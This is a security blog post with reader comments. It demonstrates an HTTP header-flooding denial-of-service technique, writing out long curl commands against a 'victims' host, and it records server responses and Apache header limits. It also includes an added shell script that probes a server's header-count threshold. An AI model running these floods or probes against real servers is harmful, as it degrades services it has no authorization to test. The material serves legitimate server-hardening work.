A question came up on a case where DoS attempts had been made against a web server using heavily modified HTTP headers. So I figured I would demonstrate such an attack using curl.
In this case, the attacker sent valid requests, but each one carried a number of bogus header fields. So I got creative and figured I would show you how I would conduct that attack. The idea is to flood the server with far more header fields than the average client browser would ever send. It's easy to test this with curl and the -H option, which adds an arbitrary header field to the request and can be repeated as many times as you like.
e.g.
curl -v -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: www.victims.com" --request TRACEKEN www.victims.com
HTTP/1.1 itself puts no upper bound on the number or size of header fields, so a client can send as many as it likes; the request line still has to be syntactically valid, though, or the server rejects it before it ever looks at the headers. In the above, my request method was a simple "TRACEKEN", which was a play on the HTTP request method TRACE and my first name KEN :)
Here's what my server replied upon receipt of that request:
>
< HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:09:19 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 220
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0845525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:13:11 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>TRACEKEN to /index.html not supported.<br />
</p>
</body></html>
* Connection #0 to host www.victim.com left intact
* Closing connection #0
It was smart enough to recognize that TRACEKEN was not a valid method, but it kicked out an error code of the 5XX series, and it even handed me the list of request methods it does accept (see the Allow: line above).
Hmm, interesting.
So if I increase the header count to some god-only-knows-what number, the server has to parse every one of those header fields before it can process (or reject) the request:
curl -v -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: www.victims.com" --request TRACEK www.victims.com
And in this example, it still generated a 5XX error code (not good):
< HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:23:46 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 218
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:27:38 GMT;path=/;httponly
<
Now if I continued along that line and pushed the number of header fields past the server's limit, the server gives me a 4XX code instead. On Apache that limit is the LimitRequestFields directive (100 fields by default), and the companion LimitRequestFieldSize directive (8190 bytes by default) caps the size of any single field:
< HTTP/1.1 400 Bad Request
< Date: Fri, 28 Dec 2012 00:24:49 GMT
< Server: Apache
< Content-Length: 290
< nnCoection: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:28:41 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
The number of request header fields exceeds this server's limit.</p>
</body></html>
BTW: I also tried that same HTTP request against my mail hosting outfit, and it gave me the same 4XX error code, but when the number of headers was reduced, it just delivered a 301 redirection.
Here's an example of a Microsoft IIS web server's response to the same TRACE/TRACEKEN request with a large set of header fields:
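The sequence above (a handful of bogus fields gets 501 for the unknown method, too many fields gets 400) can be turned into a quick probe of where a given server's header-count limit sits. The following shell script is an added example, not code from the original post. It assumes curl is installed and that the target URL is a server you are authorized to test; the hostname in the usage comment is a placeholder, and the threshold the probe finds depends entirely on the server's configuration.

```sh
#!/bin/sh
# Added example, not from the original post. Assumes curl is installed and the
# target is a server you are authorized to test.

# probe_with_curl N URL
#   Sends one request in the style of the post: the bogus method TRACEKEN plus
#   N duplicate "User-Agent: testing" fields, and prints only the HTTP status
#   code. curl adds a couple of fields of its own (Host, Accept), so the server
#   actually sees slightly more than N header fields.
probe_with_curl() {
  n=$1
  url=$2
  set --                       # reuse the function's positional parameters as an argv list
  i=0
  while [ "$i" -lt "$n" ]; do
    set -- "$@" -H "User-Agent: testing"
    i=$((i + 1))
  done
  curl -s -o /dev/null -w '%{http_code}' --max-time 10 -X TRACEKEN "$@" "$url"
}

# find_header_limit URL LO HI [SENDER]
#   Bisects between LO (a header count the server accepts, i.e. answers with
#   anything but 400) and HI (a count known to be rejected with 400) and prints
#   the smallest count that triggers 400. SENDER is a command invoked as
#   "SENDER N URL" that prints a status code; it defaults to probe_with_curl and
#   exists so the search can also be driven by a stand-in responder offline.
#   A probe that fails outright (no response, curl exit code non-zero) counts as
#   "000", which the search treats as not-rejected.
find_header_limit() {
  url=$1
  lo=$2
  hi=$3
  sender=${4:-probe_with_curl}
  while [ $((hi - lo)) -gt 1 ]; do
    mid=$(((lo + hi) / 2))
    code=$("$sender" "$mid" "$url") || code=000
    if [ "$code" = "400" ]; then
      hi=$mid
    else
      lo=$mid
    fi
  done
  echo "$hi"
}

# Usage against a real target (placeholder hostname; left commented out so the
# script runs offline):
#   find_header_limit http://www.example.test/ 1 1000
# On a stock Apache (LimitRequestFields 100) the answer lands around 100.
```

Run it against your own server with a low LO and a generous HI; the number it prints is the first header count that tips the server from the 501 (or whatever it answers for a bogus method) into the 400 seen in the post, which tells you how much slack an attacker has before the request-parsing work is cut short.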
< HTTP/1.1 501 Not Implemented
< Content-Type: text/html
< Server: Microsoft-IIS/7.5
< Set-Cookie: .ASPXANONYMOUS=IFulQiUbzgEkAAAANmVmMzQxMjYtOWY0NS00NDI2LThjNmUtOTY1NDJmYzBlY2Fjxq6qN8WmCfVI5ORB_WjaZz3LHIU1; expires=Thu, 07-Mar-2013 11:16:48 GMT; path=/; HttpOnly
< Date: Fri, 28 Dec 2012 00:36:48 GMT
< Content-Length: 1508
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>501 - Header values specify a method that is not implemented.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>501 - Header values specify a method that is not implemented.</h2>
<h3>The page you are looking for cannot be displayed because a header value in the request does not match certain configuration settings on the Web server. For example, a request header might specify a POST to a static file that cannot be posted to, or specify a Transfer-Encoding value that cannot make use of compression.</h3>
</fieldset></div>
</div>
Happy hunting, and best wishes to both the DoS attackers and the DoS defenders.
Ken Felix
Freelance Security & Network Engineer
kfelix at hyperfeed dot com
Hello, is there any method to fix this? I mean the 400 one.
I don't know what you mean by fix, but to prevent this, an IPS rule or, better yet, a WAF would prevent oversize HTTP headers or HTTP request lengths.
Is there any way I can increase the header length? So that even if someone gives a long proxy greater than the size of 1024 it doesn't throw me the 400 error? Actually in my system I have a curl command which has a long proxy 'AAAAAAAAAAA' and so on. And if I am running the command with the long proxy it gives me a 400 error, the same as above, but if I shorten the proxy and then run the command I am getting the required result. As I am trying to fix the HTTPONLY vulnerability in my system, to cross-check this our security team gave us the curl command, but with the original command they gave with the long proxy we are getting 400. I want to get a code like 300 or 302 even with the long proxy (i.e. the original command). Kindly suggest how I can do that?